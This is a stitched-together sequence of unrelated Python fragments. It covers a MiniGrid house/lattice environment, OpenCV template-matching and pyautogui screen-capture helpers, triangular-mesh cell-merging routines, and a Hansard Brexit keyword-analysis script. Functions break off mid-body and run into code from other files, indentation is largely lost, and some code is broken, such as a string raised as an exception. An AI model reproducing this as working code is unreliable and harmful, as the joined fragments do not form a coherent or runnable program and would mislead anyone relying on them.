            if ((i,j),(i,j+1)) in self.lattice.edges:
                coords = (random.choice(range(xL+1, xR)), yB)
                self._add_door(coords)
                doors.append(coords)
#Construct list of rooms. Format ((i,j),room_w, room_h, list_of_doors to the right and up)
#rooms += ((i,j), room_w, room_h, doors)
def _add_door(self, coords):
"""Add door at coords = (x,y)"""
x, y = coords
assert isinstance(self.get(x,y), Wall), 'You can\'t put a door outside of a wall!'
self.set(x, y, Door(color='purple', is_open=self.doors_open, is_locked=False))
    def _add_reward(self):
        """Add reward in final room."""
        i, j = self.lattice.end
        xL = i * self.room_w + i
        yT = j * self.room_h + j
        xR = xL + self.room_w + 1
        yB = yT + self.room_h + 1
        if self.verbose:
            print('Adding reward in room ({},{})'.format(i, j))
            print('Choosing tile in square [{},{}] X [{},{}]'.format(xL+2, xR-2, yT+2, yB-2))
        x = random.choice(range(xL+2, xR-1))
        y = random.choice(range(yT+2, yB-1))
        self.set(x, y, Goal())
# TODO how does this get converted to reward?
def _add_obstacles(self):
pass
# TODO add obstacles
# TODO other objects?
class Lattice:
"""
Connected subgraph of a lattice graph.
"""
# Max lattice size
MIN_DIM = 2 # 2-by-2
MAX_DIM = 5 # 5-by-5
# Node colors
BASE_COLOR = 'gray'
START_COLOR = 'black'
END_COLOR = 'green'
def __init__(self, dim=None, edges=None, start=None, end=None):
"""
Create graph.
@param dim: Array with lattice dimensions e.g. a 2-by-3 grid should have dim = [2,3].
@param edges: Array or set of edges as coordinate pairs. Random if not given.
"""
# Create base graph containing all edges in lattice
if dim is None:
x = random.choice(range(self.MIN_DIM, self.MAX_DIM+1))
y = random.choice(range(self.MIN_DIM, self.MAX_DIM+1))
dim = [x,y]
self.dim = dim
# I have to permute dim here because graphs are defined as [m_rows, n_cols] but I want to do [x, y]
self._base_graph = nx.grid_graph(dim=[self.dim[1], self.dim[0]])
# Select subgraph either from edges variable or randomly
if edges is not None:
self._graph = nx.Graph()
self._graph.add_nodes_from(self._base_graph.nodes)
self._graph.add_edges_from(edges)
assert nx.is_connected(self._graph), 'Wrong edges: the graph should be connected!'
else:
self._graph = get_random_connected_subgraph(self._base_graph)
# Generate start and end if not given and make sure they're not the same node
if start and end:
assert start!=end, 'Start and end nodes should be different!'
if start is None:
start = random.choice([node for node in list(self._graph.nodes) if node!=end])
if end is None:
end = random.choice([node for node in list(self._graph.nodes) if node!=start])
self.start = start
self.end = end
# Color graph according to start/end
self._colors = {n: self.BASE_COLOR for n in self._graph.nodes}
self._colors[self.start] = self.START_COLOR
self._colors[self.end] = self.END_COLOR
nx.set_node_attributes(self._graph, self._colors, 'color')
# Make these visible
self.nodes = self._graph.nodes
self.edges = self._graph.edges
def shortest_path(self):
"""Shortest path between start and end."""
return nx.shortest_path(self._graph, self.start, self.end)
def plot(self, ax=None, node_kwds={'s': 100}, edge_kwds={'color': 'gray'}):
# TODO nodes (not edges) should be overlaid at the forefront
if ax is None:
fig, ax = plt.subplots()
[ax.plot(*zip(*edge), **edge_kwds) for edge in self._graph.edges]
[ax.scatter(*node, color=self._graph.nodes[node]['color'], **node_kwds) for node in self._graph.nodes]
ax.invert_yaxis()
return ax
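# Example usage (illustrative sketch, not part of the original module):
#   lattice = Lattice(dim=[3, 3])
#   house = House(lattice, room_w=4, room_h=4)
#   house.plot(); plt.show()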
class HouseEnv(MiniGridEnv):
"""
House environment for IDA
"""
    MAX_GRID_SIZE = Lattice.MAX_DIM*(max(House.MAX_ROOM_WIDTH, House.MAX_ROOM_HEIGHT)+1)+1
def __init__(
self,
dim = None, # Lattice params
edges = None,
start = None,
end = None,
room_w = None, # House params
room_h = None,
obstacles = False,
doors_open = True,
verbose = False,
padding = True,
size = None, # Total grid size - only when padding
pos_in_room = None, # Agent position w/in start room
agent_dir = None, # Agent direction in 0 to 3
):
# Generate lattice
# TODO these should be dynamically updated after lattice created
self.dim = dim
self.edges = edges
self.start = start
self.end = end
self.lattice = Lattice(dim=self.dim, edges=self.edges, start=self.start, end=self.end)
# Create the grid
self.room_w = room_w
self.room_h = room_h
self.obstacles = obstacles
self.doors_open = doors_open
self.grid = House(
lattice = self.lattice,
room_w = self.room_w,
room_h = self.room_h,
)
self.width = self.grid.width
                # TODO: iterate this section for efficiency
same_parts, different_parts = self.image_difference(threshold, needle_directory, needle_section[4], haystack_directory, haystack_section[4], remaining_iterations)
similarities.append(same_parts)
differences.append(different_parts)
else:
print("There are no matches.")
return similarities, differences
def character_concat(self, threshold, multiboxes, matches):
# Concat data together to form usable words
        match_len = len(matches)
        if match_len == 0:
            return []
        temp_array = matches[0]
result_array = []
if multiboxes:
skip_next = False
for index in range(1, match_len):
if abs(matches[index-1][1] - matches[index][1]) < threshold:
print(temp_array)
# Sum width of each character
temp_array[2] = temp_array[2] + (matches[index][0]-matches[index-1][0])
# Add character to the end
if multiboxes:
if not skip_next:
temp_array[4] = temp_array[4] + matches[index][4]
else:
skip_next = False
else:
temp_array[4] = temp_array[4] + matches[index][4]
print(temp_array)
if index < match_len-1 and abs((matches[index][0]+matches[index][2]) - matches[index+1][0]) > threshold and len(temp_array[4]) > 1:
if multiboxes:
skip_next = True
temp_array[2] = matches[index][2] + matches[index][0] - temp_array[0]
result_array.append(temp_array)
temp_array = matches[index+1]
                        # NOTE: reassigning the loop variable is a no-op in a
                        # Python for loop; only the skip_next flag above
                        # actually skips the following match.
else:
temp_array[4] = temp_array[4] + ' '
if index == match_len - 1 and len(temp_array[4]) > 1:
result_array.append(temp_array)
temp_array = matches[index]
elif len(temp_array[4]) > 1:
result_array.append(temp_array)
temp_array = matches[index]
# Clean up results
print(result_array[0][4])
result_len = len(result_array)
for index in range(0, result_len-2):
if multiboxes:
temp_str = result_array[index][4]
result_array[index][4] = temp_str.replace("o8", "8").replace("co", "c").replace("og", "g")
if index > 0 and result_array[index][4] == 'rg':
result_array.pop(index)
result_array[index-1][4] = result_array[index-1][4] + 'g'
if result_array[index][4] == 'lng':
result_array.pop(index)
result_array[index-1][4] = result_array[index-1][4] + 'ng'
elif not multiboxes:
result_array[index][4] = result_array[index][4].replace("n r g", "ng").replace("c o", "c").replace("i l", "i").replace("n r ", "n")
return result_array
def proximity_combine(self, list_a, list_b):
# Combine elements in lists to form combinations
list_a_len = len(list_a)
list_b_len = len(list_b)
combined_list = []
for index_a in range(0, list_a_len):
for index_b in range(0, list_b_len):
distance_x = abs(list_a[index_a][0] - list_b[index_b][0])
distance_y = abs(list_a[index_a][1] - list_b[index_b][1])
# Finds smallest width
padding = (min(list_a[index_a][2], list_b[index_b][2]))*2
if distance_x < padding and distance_y < padding:
if list_a[index_a][0] < list_b[index_b][0]:
combined_str = str(list_a[index_a][4])+str(list_b[index_b][4])
new_x = list_a[index_a][0]
new_y = list_a[index_a][1]
else:
combined_str = str(list_b[index_b][4]) + str(list_a[index_a][4])
# the list_b element comes first, so anchor the combined box at it
new_x = list_b[index_b][0]
new_y = list_b[index_b][1]
if combined_str not in combined_list:
combined_width = list_a[index_a][2]+list_b[index_b][2]
new_height = list_a[index_a][3]
combined_list.append([new_x, new_y, combined_width, new_height, combined_str])
return combined_list
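# Hedged usage sketch: given two nearby word boxes in the
# [x, y, width, height, text] layout, proximity_combine pairs them
# left-to-right (the values below are illustrative only):
#
#   list_a = [[100, 40, 30, 12, 'iron']]
#   list_b = [[135, 42, 25, 12, 'ore']]
#   # |100-135| = 35 < 2*min(30, 25) = 50 and |40-42| = 2 < 50,
#   # so the result is [[100, 40, 55, 12, 'ironore']]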
def character_search(self, threshold, letters, haystack_filename):
# Keep track of all matches and identify unique cases
chars = []
chars_list = []
if letters:
chars_list = ['A', 'B', 'C', 'D', 'E',
'F', 'G', 'H', 'I', 'J',
'K', 'L', 'M', 'N', 'O',
'P', 'Q', 'R', 'S', 'T',
'U', 'V', 'W', 'X', 'Y',
'Z', '0', '1', '2', '3',
'4', '5', '6', '7', '8',
'9']
else:
chars_list = ['!', '@', '#', '$', '%', '^', '&', '*', '(', ')', '_', '-', '+', '=']
chars_list_len = len(chars_list)
if os.path.exists(self.character_directory):
files = os.listdir(self.character_directory)
self.image_index = 1
haystack = cv2.imread(self.imagedir + haystack_filename, cv2.IMREAD_UNCHANGED)
grayscale_haystack = cv2.cvtColor(haystack, cv2.COLOR_BGR2GRAY)
match_number = 0
while match_number < chars_list_len:
for f in files:
if '.png' in f:
matches = []
image_path = os.path.join(self.character_directory,
chars_list[match_number] + '_' + str(self.image_index) + '.png')
print(image_path)
if not os.path.exists(image_path):
break
needle = cv2.imread(image_path, cv2.IMREAD_UNCHANGED)
grayscale_needle = cv2.cvtColor(needle, cv2.COLOR_BGR2GRAY)
result = cv2.matchTemplate(grayscale_haystack, grayscale_needle, cv2.TM_CCOEFF_NORMED)
min_val, max_val, min_loc, max_loc = cv2.minMaxLoc(result)
# Max location has the best match with max_val to be % accuracy
width = needle.shape[1]
height = needle.shape[0]
bottom_right = (max_loc[0] + width, max_loc[1] + height)
# Threshold is the % accuracy compared to original needle
yloc, xloc = np.where(result >= threshold)
if len(xloc) > 0:
print("There are {0} total matches in the haystack.".format(len(xloc)))
for (x, y) in zip(xloc, yloc):
# Twice to ensure singles are kept after picking unique cases
matches.append([int(x), int(y), int(width), int(height)])
matches.append([int(x), int(y), int(width), int(height)])
# Grouping function
matches, weights = cv2.groupRectangles(matches, 1, 0.2)
print("There are {0} unique matches in the haystack.".format(len(matches)))
# Display image with rectangle
for (x, y, width, height) in matches:
if (x, y, width, height) not in chars:
chars.append([int(x), int(y), int(width), int(height), str(chars_list[match_number]).lower()])
# cv2.rectangle(haystack, (x, y), (x + width, y + height), (255, 255, 0), 2)
# cv2.imshow('Haystack', haystack)
# cv2.waitKey()
# cv2.destroyAllWindows()
else:
print("There are no matches.")
self.image_index += 1
print("Found " + str(len(chars)) + " of numbers in " + haystack_filename)
match_number += 1
self.image_index = 1
else:
print("Characters do not exist in screenshot.")
print(chars)
return chars
def draw_info(self, matches, haystack_filename):
# Draw the matches on the original image
boxes = []
haystack = cv2.imread(self.imagedir + haystack_filename, cv2.IMREAD_UNCHANGED)
for (x, y, width, height, name) in matches:
if (x, y, width, height) not in boxes:
boxes.append([int(x), int(y), int(width), int(height)])
cv2.rectangle(haystack, (x, y), (x + width, y + height), (255, 255, 0), 2)
cv2.imshow('Haystack', haystack)
cv2.waitKey()
cv2.destroyAllWindows()
def object_search(self, object_name, threshold, haystack_filename):
# Keep track of all matches and identify unique cases
self.object_directory = os.path.join(self.imagedir, object_name)
objects = []
if os.path.exists(self.object_directory):
files = os.listdir(self.object_directory)
self.image_index = 1
haystack = cv2.imread(self.imagedir + haystack_filename, cv2.IMREAD_UNCHANGED)
grayscale_haystack = cv2.cvtColor(haystack, cv2.COLOR_BGR2GRAY)
for f in files:
if '.png' in f:
matches = []
image_path = os.path.join(self.object_directory, object_name+str(self.image_index)+'.png')
needle = cv2.imread(image_path, cv2.IMREAD_UNCHANGED)
grayscale_needle = cv2.cvtColor(needle, cv2.COLOR_BGR2GRAY)
result = cv2.matchTemplate(grayscale_haystack, grayscale_needle, cv2.TM_CCOEFF_NORMED)
min_val, max_val, min_loc, max_loc = cv2.minMaxLoc(result)
# Max location has the best match with max_val to be % accuracy
width = needle.shape[1]
height = needle.shape[0]
bottom_right = (max_loc[0] + width, max_loc[1] + height)
# Threshold is the % accuracy compared to original needle
yloc, xloc = np.where(result >= threshold)
if len(xloc) > 0:
print("There are {0} total matches in the haystack.".format(len(xloc)))
for (x, y) in zip(xloc, yloc):
# Twice to ensure singles are kept after picking unique cases
matches.append([int(x), int(y), int(width), int(height)])
matches.append([int(x), int(y), int(width), int(height)])
# Grouping function
matches, weights = cv2.groupRectangles(matches, 1, 0.2)
print("There are {0} unique matches in the haystack.".format(len(matches)))
# Display image with rectangle
for (x, y, width, height) in matches:
if (x, y, width, height) not in objects:
objects.append([int(x), int(y), int(width), int(height)])
cv2.rectangle(haystack, (x, y), (x + width, y + height), (255, 255, 0), 2)
# cv2.imshow('Haystack', haystack)
# cv2.waitKey()
# cv2.destroyAllWindows()
else:
print("There are no matches.")
self.image_index += 1
print("Found " + str(len(objects)) + " of " + object_name + " in " + haystack_filename)
else:
print("Object does not exist in image files.")
return objects
def pick_random(self, matches):
# Pick random element in the matches list
if len(matches) > 0:
rand = random.randrange(0, len(matches))
return matches[rand]
else:
return None
def center_pos(self, single_match):
# Return a random point jittered around the center of a match
if single_match is not None:
left = int(single_match[0] + (single_match[2]*3/8))
right = int(single_match[0] + (single_match[2]*5/8))
top = int(single_match[1] + (single_match[3]*3/8))
bottom = int(single_match[1] + (single_match[3]*5/8))
randX = random.randrange(left, right)
randY = random.randrange(top, bottom)
return (randX, randY)
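# How these helpers are meant to chain together, from inside the class
# (a sketch, not part of the original flow; 'screen.png' and the 0.8
# threshold are placeholders):
#
#   chars = self.character_search(0.8, True, 'screen.png')
#   target = self.pick_random(chars)
#   if target is not None:
#       x, y = self.center_pos(target)   # jittered point near the match center
#       pyautogui.moveTo(x, y)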
def on_move(self, x, y):
if self.running:
# Get mouse position
self.currentMouseX, self.currentMouseY = pyautogui.position()
mousedistance = abs(self.currentMouseX - self.prevMouseX) + abs(self.currentMouseY - self.prevMouseY)
# Check that the mouse has moved far enough, and rate-limit to at most once per second
self.delta_time(False)
if mousedistance > 20 and self.deltaTime > 1:
# Set previous time
self.delta_time(True)
# Takes screenshot, crops it to specified size, and saves under object_directory
screenshot = pyautogui.screenshot()
image = cv2.cvtColor(np.array(screenshot), cv2.COLOR_RGB2BGR)
x = int(self.currentMouseX - (self.crop_size / 2))
y = int(self.currentMouseY - (self.crop_size / 2))
w = x+int(self.crop_size)
h = y+int(self.crop_size)
# numpy images are indexed [row, col] == [y, x], so slice rows first
cropped_image = image[y:h, x:w]
# cv2.imshow('Cropped', cropped_image)
if platform == "linux" or platform == "linux2":
cv2.imwrite(self.object_directory+'/'+self.object_on_mouse+str(self.image_index)+'.png', cropped_image)
elif platform == "win32":
cv2.imwrite(self.object_directory+'\\'+self.object_on_mouse+str(self.image_index)+'.png', cropped_image)
self.image_index += 1
print('There are '+str(self.image_index)+' images of '+self.object_on_mouse)
# print('Mouse moved to {0}'.format((x, y)))
def delta_time(self, set_last):
# Calc delta time to save to macro
self.deltaTime = round((time.perf_counter()-self.lastTimestamp), 1)
if set_last:
self.lastTimestamp = round(time.perf_counter(), 3)
def on_click(self, x, y, button, pressed):
# Mouse press action
if self.running:
if pressed:
# Get mouse position
self.currentMouseX, self.currentMouseY = pyautogui.position()
print('Mouse '+str(button)+' {0} at {1}'.format('pressed' if pressed else 'released', (x, y)))
if not pressed:
# Stop listener
return False
def on_release(self, key):
# Watch an object
try:
if key.char == self.start_button and self.running:
self.running = False
print("Stopped watching {0}".format(self.object_on_mouse))
elif key.char == self.start_button:
print("What object are you showing me under the mouse cursor?")
# self.object_on_mouse = input()
print("How big is it?")
# Just crops box of this size
depths = [1,2,3,4,5,6]
for depth in depths:
self.max_depth = depth+1
bc = self.bad_cells()
print("Start of cell-nudge with search depth %d, bad_cell count %d "%(depth,len(bc)))
for bad_cell in bc:
self.nudge_cell_search(bad_cell,depth)
def full_go(self):
self.stats()
self.pass_one()
self.stats()
self.pass_two()
self.stats()
def try_to_fix_cell_structure(self,bad_cell,verbose=False):
"""
attempt to fix the angle constraints for this cell.
return true if we changed anything (such that bad cells
should be recomputed)
"""
# try to figure out what's going on with bad_cell:
verts = self.points[self.cells[bad_cell],:2]
angles = self.tri_angles( [bad_cell] )[0]
# optionally plot what's going on
if 0:
verts4 = concatenate( (verts,verts[:1]) )
plot(verts4[:,0],verts4[:,1],'r-o')
for i in range(3):
annotate( "%g"%(angles[i]*180/pi) , verts[i] )
axis('equal')
### Test 1: is it on the boundary?
## note: doesn't handle a triangle that is a corner of the boundary
bdry_points = [] # indices to points that are on the boundary:
for edge_i in self.cell2edges(bad_cell):
nbr = self.edges[edge_i,4]
if nbr == -1:
bdry_points.append( self.edges[edge_i,0] )
bdry_points.append( self.edges[edge_i,1] )
bdry_points = unique(bdry_points)
if verbose:
print("boundary points: ",bdry_points)
if len(bdry_points) == 2:
if verbose:
print("2 boundary points - dispatch to fix_boundary_cell")
return self.try_to_fix_boundary_cell(bad_cell,bdry_points,verbose)
### Test 2: is the node with the bad angle an internal node with
## 4 cells?
bad_node = self.cells[bad_cell,find(angles > self.max_angle)[0] ]
bad_nodes_cells = self.pnt2cells(bad_node)
total_angle = self.boundary_angle(bad_node)
if total_angle == 0.0 and len(bad_nodes_cells) == 4:
return self.try_to_fix_quad(bad_node,verbose)
return False # didn't fix anything
def try_to_fix_boundary_cell(self,bad_cell,bdry_points,verbose=False):
""" look for ways to fix a boundary cell with a bad angle.
"""
# right now we only know how to look for a boundary point on a straight
# edge that can then be removed
for bdry_point in bdry_points:
n_cells = len( self.pnt2cells(bdry_point) )
# compute the boundary angle at this point
angle = self.boundary_angle(bdry_point)
if verbose:
print("Angle at boundary point %i is %g"%(bdry_point,angle))
# is it a problem?
# if the interior angle is divided evenly amongst
# the current cells, how well do we do?
if (2*pi - angle) / n_cells > self.max_angle:
if verbose:
print("Yep, there are %d cells, interior angle %g, violates max angle"%(n_cells,360 - angle*180/pi))
# common case - the node is along a straight or nearly straight boundary
if abs(pi - angle) < 10*pi/180. and n_cells == 2:
# make sure we're not creating a 4-way cross
# first find the interior point common to our two cells
my_cells = list( self.pnt2cells(bdry_point) )
cellA = my_cells[0]
cellB = my_cells[1]
int_point = None
for p in self.cells[cellA]:
if p != bdry_point and p in self.cells[cellB]:
int_point = p
break
if int_point is None:
raise "Why can't I find the interior point common to these cells?"
n_cells_at_interior = len( self.pnt2cells(int_point) )
angle_at_interior = 2*pi - self.boundary_angle(int_point)
if angle_at_interior / (n_cells_at_interior-1) > self.max_angle:
if verbose:
print("Hmm - can't remove %d because it would leave too few cells for %d"%(bdry_point,int_point))
else:
if verbose:
print("Great - we should merge %d and %d, and remove node %d"%(cellA,cellB,bdry_point))
self.merge_cells(cellA,cellB,bdry_point)
self.boundary_cells_merged += 1
return True
else:
pass
# print "Boundary angle is bad, but it's not close enough to a straight line"
else:
# print "The boundary angle is not the problem"
pass
return False
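# Worked example of the test above: a boundary node on a straight edge has
# boundary_angle ~= pi, so the interior angle is 2*pi - pi = pi. Shared
# evenly between n_cells = 2 triangles, that is pi/2 (90 degrees) per cell.
# If self.max_angle is below pi/2 - e.g. 85 degrees expressed in radians,
# an assumption here about typical settings - the test fires and the two
# cells are merged into one.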
def merge_cells(self,cellA,cellB,dead_node):
""" merge two cells that are on the border
"""
# the structures that have to be updated:
# cells, edges
# and invalidate these:
# _pnt2cells, _vcenters [ pnts2edge no longer ] , _pnt2edges
new_points = setdiff1d(ravel( self.cells[ [cellA,cellB] ] ), [dead_node])
if 0:
figure(1)
cla()
self.plot_cells([cellA,cellB])
# if there were information to copy over about the
# cells, this would be where, but I think all of the interesting
# stuff is in the edges.
cellA_edges = find( any(self.edges[:,3:]==cellA,axis=1) )
cellB_edges = find( any(self.edges[:,3:]==cellB,axis=1) )
common_edge = intersect1d(cellA_edges,cellB_edges)
dead_node_edges = self.pnt2edges(dead_node)
# rather than deleting the cells outright, maybe
# it's smarter to record how to fix their edges
# for each cell, one edge stays the same (but gets its
# cell neighbor updated to the new_cell_id).
# one edge is removed entirely, and one edge gets
# merged with the other triangle extra edge, to create
# a new edge. here it should take the
new_cell_id = cellA #
self.cells[new_cell_id,:] = new_points
# edges that used to point to cellB now point to cellA
self.edges[ self.edges[:,3]==cellB, 3 ] = new_cell_id
self.edges[ self.edges[:,4]==cellB, 4 ] = new_cell_id
# this should create one edge that now has new_cell_id on
# both sides, which is the edge we want to delete outright
dead_edge = find( all(self.edges[:,3:]==new_cell_id,axis=1) )[0]
edges_to_merge = setdiff1d( dead_node_edges, [dead_edge] )
self.edges[dead_edge,:] = -1
points_on_merge_edge = setdiff1d(ravel( self.edges[edges_to_merge,:2] ),[dead_node])
merged_edge = edges_to_merge[0]
raise Exception("This code needs to be updated - fix _pnt2edges!")
# good time to fix pnts2edge:
# remove the mappings for the two short edges:
for other_point in points_on_merge_edge:
nodes = (dead_node,other_point)
if nodes[0] > nodes[1]:
nodes = (other_point,dead_node)
del self.pnts2edge[nodes]
# make sure its endpoints are set right, and
self.edges[merged_edge,:2] = points_on_merge_edge
# if self.edges[edges_to_merge[0],2] != self.edges[edges_to_merge[1],2]:
# print "Marker is different on these two edges... just guessing"
if points_on_merge_edge[0] > points_on_merge_edge[1]:
new_node_pair = (points_on_merge_edge[1],points_on_merge_edge[0])
else:
new_node_pair = (points_on_merge_edge[0],points_on_merge_edge[1])
self.pnts2edge[new_node_pair] = merged_edge
# mark the other edge as deleted
self.edges[edges_to_merge[1],:] = -1
# mark the other cell deleted:
self.delete_cell(cellB) # self.cells[cellB,:] = -1
# so what all has been invalidated at this point?
# _pnt2cells, _vcenters, pnts2edge
if self._pnt2cells:
del self._pnt2cells[dead_node]
for new_point in new_points:
set_of_cells = self._pnt2cells[new_point]
if cellB in set_of_cells:
set_of_cells.remove(cellB)
set_of_cells.add(cellA)
self._vcenters = None # lazy
# record that we changed stuff:
self.changed_cells.append(cellA)
self.changed_cells.append(cellB)
def plot_cells(self,c_list,nbr_count=0,label_nodes=True,label_cells=True,label_edges=False):
""" plot cell ids, vertex ids and edges for
the given cells.
if nbr_count is > 0, include cells that are up to
nbr_count cells away
"""
c_list = array(c_list)
while nbr_count > 0:
new_c_list = c_list
for cell in c_list:
new_c_list = concatenate([new_c_list,self.cell_neighbors(cell)])
c_list = unique(new_c_list)
nbr_count -= 1
ax = gca()
points = unique(ravel( self.cells[ c_list ] ))
plot(self.points[points,0],self.points[points,1],'ro')
if label_nodes:
for p in points:
annotate(str(p),self.points[p,:2])
# annotate centers of cells
vc = self.vcenters()
for c in c_list:
if 0: # enable if there are possible edge/cell discrepancies
nodes = self.cells[c,[0,1,2,0]]
plot(self.points[nodes,0],
self.points[nodes,1],'b-')
#ctr = mean(self.points[self.cells[c],:2],axis=0)
# use the voronoi center:
ctr = vc[c]
if label_cells:
annotate('c%i'%c,ctr)
# plot edges:
edge_list = array([],int32)
for c in c_list:
edge_list = concatenate( (edge_list,find(any(self.edges[:,3:]==c,axis=1))) )
for e in unique(edge_list):
if self.edges[e,4] < 0:
color = 'r'
lw = 2
else:
color = 'b'
lw = 1
nodes = self.points[ self.edges[e,:2],:2 ]
plot( nodes[:,0],nodes[:,1],color,lw=lw )
if label_edges:
annotate("%i"%e,mean(nodes,axis=0)[:2])
axis('equal')
def try_to_fix_quad(self,node,verbose=False):
""" group of four triangles around one point
merge pairs.
"""
# print "fix_quad"
# find the four outside vertices, in order (starting point
# doesn't matter)
# compute interior quad angle at each
# the pair (0,2) or (1,3) with smaller average angle
# define the endpoints (along with node) of the
# edges to be removed.
# get with it...
cells = list(self.pnt2cells(node))
if 0:
subplot(211)
cla()
self.plot_cells(cells)
cell_points_not_node = setdiff1d(ravel(self.cells[cells,:]),[node])
# print cell_points_not_node
deltas = self.points[cell_points_not_node,:2] - self.points[node,:2]
angles = arctan2(deltas[:,1],deltas[:,0])
quad_verts = cell_points_not_node[ argsort(angles) ]
quad_points = self.points[quad_verts,:2]
# now we have the outer four vertices in CCW order.
quad_angles = zeros( (4,), float64)
# plot( quad_points[ [0,1,2,3,0],0],
# quad_points[ [0,1,2,3,0],1] )
for i in range(4):
im1 = (i-1)%4
ip1 = (i+1)%4
delta_prev = quad_points[i] - quad_points[im1]
delta_next = quad_points[ip1] - quad_points[i]
angle_prev = arctan2(delta_prev[1],delta_prev[0])
angle_next = arctan2(delta_next[1],delta_next[0])
quad_angles[i] = (angle_prev+pi - angle_next) % (2*pi)
# print quad_points[i]
# annotate( "%g"%(quad_angles[i]*180/pi), quad_points[i] )
# now decide which way to merge:
# switch the order of quad_verts so that 0 and 2 are the points that
# define the merge axis
if (quad_angles[1]+quad_angles[3]) < (quad_angles[0] + quad_angles[2]):
quad_verts = quad_verts[ [1,2,3,0] ]
# print "Edges to be removed: %i-%i | |
# This script is for running the analysis that comes after the cross-entropy stuff.
import pandas as pd
import os
import sys
from datetime import datetime
import numpy as np
import sqlite3
import nltk
import regex as re
import spacy
import json
with open("../project-config.json") as config_file:
project_config = json.load(config_file)
DB_FP = project_config["DB_FP"]
MP_Group_FP = project_config["GROUPS_FP"]
with open(project_config["SPEAKER_FILE"]) as speaker_file:
speaker_list = json.load(speaker_file)
from helper_functions import clean_text, spacy_tokenise, get_contribution_windows, get_keywords_from_tokens, split_corpus
sql_get_all_posts ="""
SELECT c.uid, m.name, m.PimsId, p.party, d.date, c.body, c.topic, c.section, s.tmay_deal, s.benn_act, s.ref_stance, s.constituency_leave, c.usas_file
FROM contributions as c
INNER JOIN members as m
ON m.PimsId = c.member
INNER JOIN debates as d
ON d.uid = c.debate
INNER JOIN member_party as p
ON p.PimsId = m.PimsId
INNER JOIN member_stances as s
ON s.PimsId = m.PimsId
WHERE (d.date BETWEEN date("2015-05-01") AND date("2019-12-11"))
AND (((d.date BETWEEN p.start AND p.end) AND NOT (p.end IS NULL))
OR ((d.date >= p.start) AND (p.end IS NULL)));""".strip()
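# The final WHERE clause resolves party membership on the day of the debate:
# a membership row matches either when the debate date falls inside a closed
# [start, end] interval, or when it is on/after start for a still-open
# membership (end IS NULL). For example, a debate on 2017-06-10 (an
# illustrative date) matches a row with start=2015-05-08, end=NULL, but not
# one whose membership ended on 2017-06-08.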
convert_to_date = lambda x: datetime.strptime(x, "%Y-%m-%d %H:%M:%S")
def check_dir(dir_name):
"""
Checks if a directory exists. Makes it if it doesn't.
"""
if not os.path.exists(dir_name):
os.makedirs(dir_name)
def tokenise(text):
"""
Turns given text into tokens.
"""
cleaned = clean_text(text)
cleaned = re.sub(r"(\p{P})\p{P}*", r"\1 ", cleaned)
tokens = spacy_tokenise(cleaned)
return tokens
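# A hedged sketch of what the punctuation rewrite above does before spaCy
# tokenisation (clean_text/spacy_tokenise come from helper_functions, so
# their exact behaviour is assumed here):
#
#   re.sub(r"(\p{P})\p{P}*", r"\1 ", "Order, order!!")
#   # -> "Order,  order! "  - each run of punctuation collapses to its
#   # first character followed by a space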
def get_groups_toks_and_contribs(queries, gnames, all_contributions, all_toks, token_limit=60):
"""
Gets the provided groups and tokens given pandas queries.
"""
out_contribs = dict()
out_toks = dict()
for query, gname in zip(queries, gnames):
# Get contributions for each group.
curr = all_contributions.query(query)
# Get tokens for each group.
curr_toks = all_toks[all_toks.index.isin(curr.index)]
# Only keep contributions with at least token_limit tokens, truncated to that length.
curr_toks = curr_toks[curr_toks.apply(len) >= token_limit].apply(lambda x: x[:token_limit])
# Drop contributions that fell below the token limit.
curr = curr[curr.index.isin(curr_toks.index)]
# Set output
out_contribs[gname] = curr
out_toks[gname] = curr_toks
# Create combined list of contributions
combined = pd.concat(list(out_contribs.values()), axis=0)
return out_contribs, out_toks, combined
if __name__ == "__main__":
# out_dir = input("Enter output directory:")
out_dir = "C:/Users/Eddie/Documents/Datasets/Hansard Output/Keywords/15K"
window_start = convert_to_date("2019-04-01 00:00:00")
window_end = convert_to_date("2019-09-03 00:00:00")
check_dir(out_dir)
token_limit = 60
queries = ["party == 'Conservative'", "party == 'Labour'"]
gnames = ["Conservative", "Labour"]
conn = sqlite3.connect(DB_FP)
curs = conn.cursor()
# Gets all the contributions and creates a nice dataframe
all_contributions = pd.read_sql_query(sql_get_all_posts, conn)
all_contributions.columns = ['uid', 'name', 'PimsId', 'party', 'date', 'text', 'topic', 'section', 'tmay_deal', 'benn_act', 'ref_stance', 'constituency_leave', 'usas_file']
all_contributions.set_index("uid", inplace=True)
all_contributions['date'] = all_contributions['date'].apply(convert_to_date)
all_contributions = all_contributions.query("PimsId not in @speaker_list")
all_contributions.sort_values("date", inplace=True)
# Tokenise the contributions
all_toks = all_contributions["text"].apply(tokenise)
# Only keep contributions with at least token_limit tokens
all_toks = all_toks[all_toks.apply(len) >= token_limit]
all_contributions = all_contributions.loc[all_toks.index]
# Get the EU and Non-EU mentions
eu_mentions, non_eu_mentions = split_corpus(all_contributions, "eu")
# Get tokens of EU-mentions
eu_toks = all_toks.loc[eu_mentions.index]
# Get tokens of Non-EU-mentions
non_eu_toks = all_toks.loc[non_eu_mentions.index]
# Get the non-EU Conservative and Labour groups
non_eu_group_contribs, non_eu_group_toks, non_eu_combined = get_groups_toks_and_contribs(queries, gnames, non_eu_mentions, all_toks, token_limit)
non_eu_combined_toks = all_toks.loc[non_eu_combined.index]
# Get the EU Conservative and Labour groups
eu_group_contribs, eu_group_toks, eu_combined = get_groups_toks_and_contribs(queries, gnames, eu_mentions, all_toks, token_limit)
eu_combined_toks = all_toks.loc[eu_combined.index]
################################################################################################################################
# KW of Remain-Constituency Remainers against Leavers at given window
################################################################################################################################
# Get contributions from the window
in_window = eu_mentions.query("date >= @window_start and date <= @window_end")
# Get the groups
r_con_remainers = in_window.query("constituency_leave < 50 and ref_stance == 'remain'")
leavers = in_window.query("ref_stance == 'leave'")
# Calculate the keywords
kw = get_keywords_from_tokens(all_toks.loc[r_con_remainers.index], all_toks.loc[leavers.index]).to_dict()
# Save it to a file
with open(os.path.join(out_dir, "kw_against_leavers.json"), "w") as out_file:
json.dump(kw, out_file)
################################################################################################################################
# KW of Remain-Constituency Remainers against Leave-Constituency Remainers at given window
################################################################################################################################
# Get contributions from the window
in_window = eu_mentions.query("date >= @window_start and date <= @window_end")
# Get the groups
r_con_remainers = in_window.query("constituency_leave < 50 and ref_stance == 'remain'")
l_con_remainers = in_window.query("constituency_leave > 50 and ref_stance == 'remain'")
# Calculate the keywords
kw = get_keywords_from_tokens(all_toks.loc[r_con_remainers.index], all_toks.loc[l_con_remainers.index]).to_dict()
# Save it to a file
with open(os.path.join(out_dir, "kw_against_lcon_remainers.json"), "w") as out_file:
